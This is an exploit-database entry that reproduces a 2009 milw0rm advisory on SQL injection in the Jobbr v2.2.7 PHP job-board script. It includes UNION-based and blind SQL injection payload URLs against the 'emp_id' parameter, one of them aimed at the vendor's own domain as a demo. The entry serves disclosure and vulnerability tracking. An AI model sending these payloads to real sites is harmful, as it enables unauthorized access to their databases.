header-logo
Suggest Exploit
vendor:
Jobbr
by:
Moudi
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Jobbr
Affected Version From: 2.2.7
Affected Version To: 2.2.7
Patch Exists: Yes
Related CWE: N/A
CPE: a:jobbr:jobbr:2.2.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Jobbr v2.2.7 Multiple Remote SQL Injection Vulnerabilities

Jobbr v2.2.7 is vulnerable to multiple remote SQL injection vulnerabilities. An attacker can exploit these vulnerabilities to gain access to the database and execute arbitrary SQL commands. The vulnerable parameters are 'emp_id' in 'co-profile.php' page. An attacker can exploit these vulnerabilities by sending a maliciously crafted HTTP request to the vulnerable page. An example of a maliciously crafted HTTP request is http://www.jobbr.us/co-profile.php?emp_id=null+union+select+version(),2,3,4,5,6,7,8--. Another example of a maliciously crafted HTTP request is http://www.jobbr.us/co-profile.php?EMP_id=1+AND%20SUBSTRING(@@version,1,1)=5.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of the software.
Source

Exploit-DB raw data:

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
        [»] Hmmmm !? Nothing ! :D
==============================================================================
        [»] Jobbr v2.2.7 Multiple Remote SQL Injection Vulnerabilities
==============================================================================

	[»] Script:             [ Jobbr v2.2.7 ]
	[»] Language:           [ PHP ]
        [»] Download:           [ http://urx.in/jobbr ]
	[»] Founder:            [ Moudi or SixSo <m0udi@9.cn> ]
        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man...]
        [»] Team:               [ EvilWay ]
        [»] SiteWeb:            [ Visit - www.opensc.ws ]
        [»] Price:              [ FREE ]

###########################################################################

===[ Exploit BLIND SQL + DEMO ]===	
	
	[»] http://www.site.com/co-profile.php?emp_id=[SQL]
	[»] http://www.jobbr.us/co-profile.php?emp_id=null+union+select+version(),2,3,4,5,6,7,8--

===[ Exploit BLIND SQL + DEMO ]===

	[»] http://www.site.com/co-profile.php?emp_id=[BLIND]
	[»] http://www.jobbr.us/co-profile.php?emp_id=1+AND%20SUBSTRING(@@version,1,1)=5


Author: Moudi

###########################################################################

# milw0rm.com [2009-07-10]

Navigation

Suggest Exploit

Services By CQR